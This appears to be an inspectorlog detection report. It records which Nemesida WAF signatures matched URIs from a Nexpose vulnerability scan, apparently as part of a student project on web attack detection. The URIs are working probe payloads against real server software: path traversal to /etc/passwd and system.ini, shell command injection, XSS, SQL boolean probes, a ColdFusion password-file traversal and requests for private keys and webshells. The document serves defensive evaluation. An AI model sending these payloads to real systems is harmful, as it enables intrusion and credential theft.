# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l nexpose.short -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/ficheros_uris_completos/web_estatica/nemesida/nexpose_short.clean
Packet [3]	Uri [%org/jboss/version.properties]	Nattacks [1]	Signatures	[300001517]
Packet [7]	Uri [/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [12]	Uri [/.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [13]	Uri [/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [14]	Uri [/<script>xss</script>.asp]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [15]	Uri [/<script>xss</script>.aspx]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [16]	Uri [/<script>xss</script>.jsp]	Nattacks [3]	Signatures	[300000515]	[300000537]	[300001516]
Packet [17]	Uri [/<script>xss</script>.php]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [18]	Uri [/<script>xss</script>.py]	Nattacks [3]	Signatures	[300000515]	[300000537]	[300001513]
Packet [19]	Uri [/<script>xss</script>.rb]	Nattacks [3]	Signatures	[300000515]	[300000537]	[300001505]
Packet [20]	Uri [/<script>xss</script>.shtml]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [23]	Uri [/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [35]	Uri [/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [36]	Uri [/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [38]	Uri [/ADw-script%20AD4-alert(42)%20ADw-/]	Nattacks [1]	Signatures	[300000508]
Packet [39]	Uri [/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [55]	Uri [/backup/]	Nattacks [1]	Signatures	[300002856]
Packet [58]	Uri [/balancer-manager>]	Nattacks [1]	Signatures	[300001900]
Packet [70]	Uri [/bin/tracefilter.pl]	Nattacks [2]	Signatures	[300001053]	[300001513]
Packet [80]	Uri [/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [85]	Uri [/certs/cacert2.pem]	Nattacks [1]	Signatures	[300001925]
Packet [86]	Uri [/certs/cert1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [87]	Uri [/certs/cert7.db]	Nattacks [1]	Signatures	[300001526]
Packet [89]	Uri [/certs/key1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [90]	Uri [/certs/key3.db]	Nattacks [1]	Signatures	[300001526]
Packet [95]	Uri [/cfdocs/search.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [98]	Uri [/CFIDE/adminapi/customtags/adss.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [99]	Uri [/CFIDE/adminapi/customtags/fusebox.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [100]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=test&attributes.file=../../administrator/mail/download.cfm&filename=../../lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=test]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]
Packet [101]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=test&attributes.file=../../administrator/mail/download.cfm&filename=../lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=test]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001516]
Packet [102]	Uri [/CFIDE/adminapi/customtags/soft404validationcheck.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [106]	Uri [/CFIDE/administrator/enter.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [107]	Uri [/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001516]
Packet [113]	Uri [/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.componentutils.cfcexplorer&path=../../../../license.html]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [114]	Uri [/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.componentutils.cfcexplorer&path=../../../license.txt]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [115]	Uri [/CFIDE/h.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [116]	Uri [/CFIDE/h9.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [117]	Uri [/CFIDE/help.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [118]	Uri [/CFIDE/i.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [120]	Uri [/cfide/Main/ide.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [123]	Uri [/CFIDE/r.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [128]	Uri [/CFIDE/soft404validationcheck.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [134]	Uri [/cgi-bin/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [135]	Uri [/cgi-bin/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [137]	Uri [/cgi-bin/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [138]	Uri [/cgi-bin/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [139]	Uri [/cgi-bin/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [140]	Uri [/cgi-bin/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [141]	Uri [/cgi-bin/awstats.pl?debug=1]	Nattacks [1]	Signatures	[300001513]
Packet [142]	Uri [/cgi-bin/awstats.pl?PluginMode=:print+%22x%22%2e(1042+%2b+1099)%2e%22x%22;]	Nattacks [2]	Signatures	[300000051]	[300001513]
Packet [143]	Uri [/cgi-bin/awstats/awstats.pl?debug=1]	Nattacks [1]	Signatures	[300001513]
Packet [144]	Uri [/cgi-bin/awstats/awstats.pl?PluginMode=:print+%22x%22%2e(1042+%2b+1099)%2e%22x%22;]	Nattacks [2]	Signatures	[300000051]	[300001513]
Packet [145]	Uri [/cgi-bin/bad_urls.pl]	Nattacks [1]	Signatures	[300001513]
Packet [148]	Uri [/cgi-bin/counter.pl]	Nattacks [1]	Signatures	[300001513]
Packet [153]	Uri [/cgi-bin/example.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [154]	Uri [/cgi-bin/faxquery?/bin/cat%20/etc/passwd]	Nattacks [2]	Signatures	[300001053]	[300001559]
Packet [155]	Uri [/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd]	Nattacks [2]	Signatures	[300001053]	[300001559]
Packet [156]	Uri [/cgi-bin/footer.pl]	Nattacks [1]	Signatures	[300001513]
Packet [158]	Uri [/cgi-bin/htgrep/file=index.html&hdr=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300001892]
Packet [159]	Uri [/cgi-bin/htmlscript?../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001559]	[300001873]
Packet [160]	Uri [/cgi-bin/htsearch?Exclude=%60/etc/passwd%60]	Nattacks [2]	Signatures	[300001559]	[300001826]
Packet [161]	Uri [/cgi-bin/images.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [162]	Uri [/cgi-bin/index.pl]	Nattacks [1]	Signatures	[300001513]
Packet [163]	Uri [/cgi-bin/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [164]	Uri [/cgi-bin/news.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [165]	Uri [/cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd]	Nattacks [3]	Signatures	[300001053]	[300001359]	[300001559]
Packet [166]	Uri [/cgi-bin/php.ini]	Nattacks [1]	Signatures	[300001517]
Packet [167]	Uri [/cgi-bin/printenv]	Nattacks [1]	Signatures	[300001826]
Packet [168]	Uri [/cgi-bin/printenv.pl]	Nattacks [3]	Signatures	[300001513]	[300001826]	[300002846]
Packet [169]	Uri [/cgi-bin/program.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [171]	Uri [/cgi-bin/script.pl]	Nattacks [1]	Signatures	[300001513]
Packet [175]	Uri [/cgi-bin/view-source?../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [176]	Uri [/cgi-bin/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [193]	Uri [/conf/ssl/apache/integrity-smartcenter.key]	Nattacks [1]	Signatures	[300001925]
Packet [194]	Uri [/conf/ssl/apache/integrity.key]	Nattacks [1]	Signatures	[300001925]
Packet [197]	Uri [/console/faces/com_sun_web_ui/jsp/version/version_30.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [198]	Uri [/console/faces/com_sun_web_ui/jsp/version/version_4.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [199]	Uri [/console/login/LoginForm.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [202]	Uri [/crowd/console/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [210]	Uri [/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [211]	Uri [/dana-na/auth/url_default/welcome.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [247]	Uri [/error/%2e%2e%5cconf%5chttpd.conf]	Nattacks [1]	Signatures	[300001517]
Packet [311]	Uri [/home/doe/public_html/.htpasswd]	Nattacks [1]	Signatures	[300001846]
Packet [324]	Uri [/icons/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [325]	Uri [/icons/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [332]	Uri [/icons/?P=%2Fetc%2Fpasswd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [333]	Uri [/icons/?P=%2Fetc%2Fpasswd%00.htm]	Nattacks [3]	Signatures	[300001359]	[300001559]	[300002734]
Packet [334]	Uri [/icons/?P=%3Bcat+%2Fetc%2Fpasswd+]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [335]	Uri [/icons/?P=%3C%2FXSS%2F*-*%2FSTYLE%3Dxss%3Ae%2F**%2Fxpression%28%5C%22769928880%5C%22%29%3E]	Nattacks [3]	Signatures	[300000039]	[300000040]	[300001130]
Packet [336]	Uri [/icons/?P=%5C%22%3E%3Cscript%3E769928880]	Nattacks [2]	Signatures	[300000058]	[300000537]
Packet [339]	Uri [/icons/?P=%5CWindows%5Csystem.ini%00.htm]	Nattacks [1]	Signatures	[300001359]
Packet [341]	Uri [/icons/?P=%7C%7Ccat+%2Fetc%2Fpasswd+]	Nattacks [1]	Signatures	[300001559]
Packet [344]	Uri [/icons/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-%22+AND+%2236843%22%3D%2236844]	Nattacks [3]	Signatures	[300000508]	[300002728]	[300002763]
Packet [345]	Uri [/icons/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-%22+OR+%2236843%22%3D%2236843]	Nattacks [3]	Signatures	[300000508]	[300002728]	[300002763]
Packet [346]	Uri [/icons/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-%27+AND+%2736843%27%3D%2736844]	Nattacks [5]	Signatures	[300000052]	[300000508]	[300001085]	[300002728]	[300002763]
Packet [347]	Uri [/icons/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-%27+OR+%2736843%27%3D%2736843]	Nattacks [5]	Signatures	[300000052]	[300000508]	[300001085]	[300002728]	[300002763]
Packet [348]	Uri [/icons/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-+AND+36843%3D36844]	Nattacks [1]	Signatures	[300000508]
Packet [349]	Uri [/icons/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-+OR+36843%3D36843]	Nattacks [1]	Signatures	[300000508]
Packet [350]	Uri [/icons/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [351]	Uri [/icons/?P=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [352]	Uri [/icons/?P=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.htm]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [353]	Uri [/icons/?P=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Csystem.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [354]	Uri [/icons/?P=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Csystem.ini%00.htm]	Nattacks [4]	Signatures	[300000057]	[300000071]	[300001145]	[300001359]
Packet [355]	Uri [/icons/?P=../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [356]	Uri [/icons/?P=../../../../../../../../etc/passwd%00.htm]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [357]	Uri [/icons/?P=..\..\..\..\..\..\..\..\..\Windows\system.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [358]	Uri [/icons/?P=..\..\..\..\..\..\..\..\..\Windows\system.ini%00.htm]	Nattacks [4]	Signatures	[300000057]	[300000071]	[300001145]	[300001359]
Packet [359]	Uri [/icons/?P=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [360]	Uri [/icons/?P=/etc/passwd%00.htm]	Nattacks [3]	Signatures	[300001359]	[300001559]	[300002734]
Packet [361]	Uri [/icons/?P=;cat%20/etc/passwd%20]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [362]	Uri [/icons/?P=</XSS/*-*/STYLE=xss:e/**/xpression(\"769928880\")>]	Nattacks [3]	Signatures	[300000039]	[300000040]	[300001130]
Packet [364]	Uri [/icons/?P=C%3A%5CWindows%5Csystem.ini%00.htm]	Nattacks [1]	Signatures	[300001359]
Packet [366]	Uri [/icons/?P=C:\Windows\system.ini%00.htm]	Nattacks [1]	Signatures	[300001359]
Packet [367]	Uri [/icons/?P=cat%20/etc/passwd%20]	Nattacks [2]	Signatures	[300001359]	[300001559]
Packet [368]	Uri [/icons/?P=cat+%2Fetc%2Fpasswd+]	Nattacks [1]	Signatures	[300001559]
Packet [372]	Uri [/icons/?P=http%3A%2F%2Fwww.msftncsi.com%2Fncsi.txt%00]	Nattacks [1]	Signatures	[300001359]
Packet [375]	Uri [/icons/?P=http://www.msftncsi.com/ncsi.txt%00]	Nattacks [1]	Signatures	[300001359]
Packet [390]	Uri [/icons/?P=\"><script>769928880]	Nattacks [2]	Signatures	[300000058]	[300000537]
Packet [393]	Uri [/icons/?P=\Windows\system.ini%00.htm]	Nattacks [1]	Signatures	[300001359]
Packet [395]	Uri [/icons/?P=||cat%20/etc/passwd%20]	Nattacks [1]	Signatures	[300001559]
Packet [397]	Uri [/icons/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [398]	Uri [/icons/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [399]	Uri [/icons/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [401]	Uri [/icons/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [409]	Uri [/icons/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [415]	Uri [/icons/index.bak]	Nattacks [1]	Signatures	[300001927]
Packet [416]	Uri [/icons/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [417]	Uri [/icons/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [421]	Uri [/icons/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [422]	Uri [/icons/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [434]	Uri [/icons/small/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [435]	Uri [/icons/small/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [442]	Uri [/icons/small/?P=%2Fetc%2Fpasswd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [443]	Uri [/icons/small/?P=%2Fetc%2Fpasswd%00.htm]	Nattacks [3]	Signatures	[300001359]	[300001559]	[300002734]
Packet [444]	Uri [/icons/small/?P=%3Bcat+%2Fetc%2Fpasswd+]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [445]	Uri [/icons/small/?P=%3C%2FXSS%2F*-*%2FSTYLE%3Dxss%3Ae%2F**%2Fxpression%28%5C%22769928880%5C%22%29%3E]	Nattacks [3]	Signatures	[300000039]	[300000040]	[300001130]
Packet [446]	Uri [/icons/small/?P=%5C%22%3E%3Cscript%3E769928880]	Nattacks [2]	Signatures	[300000058]	[300000537]
Packet [449]	Uri [/icons/small/?P=%5CWindows%5Csystem.ini%00.htm]	Nattacks [1]	Signatures	[300001359]
Packet [451]	Uri [/icons/small/?P=%7C%7Ccat+%2Fetc%2Fpasswd+]	Nattacks [1]	Signatures	[300001559]
Packet [454]	Uri [/icons/small/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-%22+AND+%2214556%22%3D%2214557]	Nattacks [3]	Signatures	[300000508]	[300002728]	[300002763]
Packet [455]	Uri [/icons/small/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-%22+OR+%2214556%22%3D%2214556]	Nattacks [3]	Signatures	[300000508]	[300002728]	[300002763]
Packet [456]	Uri [/icons/small/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-%27+AND+%2714556%27%3D%2714557]	Nattacks [5]	Signatures	[300000052]	[300000508]	[300001085]	[300002728]	[300002763]
Packet [457]	Uri [/icons/small/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-%27+OR+%2714556%27%3D%2714556]	Nattacks [5]	Signatures	[300000052]	[300000508]	[300001085]	[300002728]	[300002763]
Packet [458]	Uri [/icons/small/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-+AND+14556%3D14557]	Nattacks [1]	Signatures	[300000508]
Packet [459]	Uri [/icons/small/?P=+ADw-script+AD4-alert%2842%29+ADw-%2Fscript+AD4-+OR+14556%3D14556]	Nattacks [1]	Signatures	[300000508]
Packet [460]	Uri [/icons/small/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [461]	Uri [/icons/small/?P=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [462]	Uri [/icons/small/?P=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.htm]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [463]	Uri [/icons/small/?P=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Csystem.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [464]	Uri [/icons/small/?P=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Csystem.ini%00.htm]	Nattacks [4]	Signatures	[300000057]	[300000071]	[300001145]	[300001359]
Packet [465]	Uri [/icons/small/?P=../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [466]	Uri [/icons/small/?P=../../../../../../../../etc/passwd%00.htm]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [467]	Uri [/icons/small/?P=..\..\..\..\..\..\..\..\..\Windows\system.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [468]	Uri [/icons/small/?P=..\..\..\..\..\..\..\..\..\Windows\system.ini%00.htm]	Nattacks [4]	Signatures	[300000057]	[300000071]	[300001145]	[300001359]
Packet [469]	Uri [/icons/small/?P=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [470]	Uri [/icons/small/?P=/etc/passwd%00.htm]	Nattacks [3]	Signatures	[300001359]	[300001559]	[300002734]
Packet [471]	Uri [/icons/small/?P=;cat%20/etc/passwd%20]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [472]	Uri [/icons/small/?P=</XSS/*-*/STYLE=xss:e/**/xpression(\"769928880\")>]	Nattacks [3]	Signatures	[300000039]	[300000040]	[300001130]
Packet [474]	Uri [/icons/small/?P=C%3A%5CWindows%5Csystem.ini%00.htm]	Nattacks [1]	Signatures	[300001359]
Packet [476]	Uri [/icons/small/?P=C:\Windows\system.ini%00.htm]	Nattacks [1]	Signatures	[300001359]
Packet [477]	Uri [/icons/small/?P=cat%20/etc/passwd%20]	Nattacks [2]	Signatures	[300001359]	[300001559]
Packet [478]	Uri [/icons/small/?P=cat+%2Fetc%2Fpasswd+]	Nattacks [1]	Signatures	[300001559]
Packet [482]	Uri [/icons/small/?P=http%3A%2F%2Fwww.msftncsi.com%2Fncsi.txt%00]	Nattacks [1]	Signatures	[300001359]
Packet [485]	Uri [/icons/small/?P=http://www.msftncsi.com/ncsi.txt%00]	Nattacks [1]	Signatures	[300001359]
Packet [500]	Uri [/icons/small/?P=\"><script>769928880]	Nattacks [2]	Signatures	[300000058]	[300000537]
Packet [503]	Uri [/icons/small/?P=\Windows\system.ini%00.htm]	Nattacks [1]	Signatures	[300001359]
Packet [505]	Uri [/icons/small/?P=||cat%20/etc/passwd%20]	Nattacks [1]	Signatures	[300001559]
Packet [507]	Uri [/icons/small/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [508]	Uri [/icons/small/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [509]	Uri [/icons/small/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [510]	Uri [/icons/small/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [518]	Uri [/icons/small/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [524]	Uri [/icons/small/index.bak]	Nattacks [1]	Signatures	[300001927]
Packet [525]	Uri [/icons/small/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [526]	Uri [/icons/small/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [530]	Uri [/icons/small/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [531]	Uri [/icons/small/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [544]	Uri [/icons/small/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [548]	Uri [/icons/small/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [559]	Uri [/icons/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [563]	Uri [/icons/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [625]	Uri [/jsp/source.jsp?/jsp/]	Nattacks [1]	Signatures	[300001516]
Packet [650]	Uri [/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [651]	Uri [/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [654]	Uri [/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [661]	Uri [/lucee/admin/ext.applications.upload.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [666]	Uri [/manual/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [667]	Uri [/manual/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [670]	Uri [/manual/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [672]	Uri [/manual/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [673]	Uri [/manual/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [674]	Uri [/manual/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [676]	Uri [/manual/bind.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [677]	Uri [/manual/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [679]	Uri [/manual/caching.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [681]	Uri [/manual/configuring.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [684]	Uri [/manual/content-negotiation.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [689]	Uri [/manual/de/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [690]	Uri [/manual/de/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [691]	Uri [/manual/de/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [693]	Uri [/manual/de/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [694]	Uri [/manual/de/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [695]	Uri [/manual/de/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [697]	Uri [/manual/de/bind.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [698]	Uri [/manual/de/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [700]	Uri [/manual/de/caching.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [702]	Uri [/manual/de/configuring.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [705]	Uri [/manual/de/content-negotiation.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [707]	Uri [/manual/de/custom-error.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [735]	Uri [/manual/de/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [740]	Uri [/manual/de/developer/%3f.jsp]	Nattacks [2]	Signatures	[300000053]	[300001516]
Packet [741]	Uri [/manual/de/developer/.svn/entries]	Nattacks [1]	Signatures	[300001506]
Packet [742]	Uri [/manual/de/developer/?P=+ADw-script+AD4-alert(42)+ADw-/script+AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [744]	Uri [/manual/de/developer/adojavas.inc]	Nattacks [1]	Signatures	[300001517]
Packet [745]	Uri [/manual/de/developer/adovbs.inc]	Nattacks [1]	Signatures	[300001517]
Packet [746]	Uri [/manual/de/developer/ADw-script%20AD4-alert(42)%20ADw-/script%20AD4-]	Nattacks [1]	Signatures	[300000508]
Packet [748]	Uri [/manual/de/developer/API.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [749]	Uri [/manual/de/developer/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [754]	Uri [/manual/de/developer/debugging.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [759]	Uri [/manual/de/developer/default.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [764]	Uri [/manual/de/developer/documenting.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [766]	Uri [/manual/de/developer/filters.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [768]	Uri [/manual/de/developer/hooks.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [772]	Uri [/manual/de/developer/index.bak]	Nattacks [1]	Signatures	[300001927]
Packet [773]	Uri [/manual/de/developer/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [774]	Uri [/manual/de/developer/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [778]	Uri [/manual/de/developer/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [779]	Uri [/manual/de/developer/index.old]	Nattacks [1]	Signatures	[300001518]
Packet [785]	Uri [/manual/de/developer/modguide.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [787]	Uri [/manual/de/developer/modules.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [789]	Uri [/manual/de/developer/new_api_2_4.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [792]	Uri [/manual/de/developer/output-filters.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [797]	Uri [/manual/de/developer/request.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [802]	Uri [/manual/de/developer/thread_safety.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
Packet [807]	Uri [/manual/de/developer/web.config]	Nattacks [1]	Signatures	[300001506]
Packet [811]	Uri [/manual/de/developer/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [820]	Uri [/manual/de/dns-caveats.html/<script>xss</script>]	Nattacks [2]	Signatures	[300000515]	[300000537]
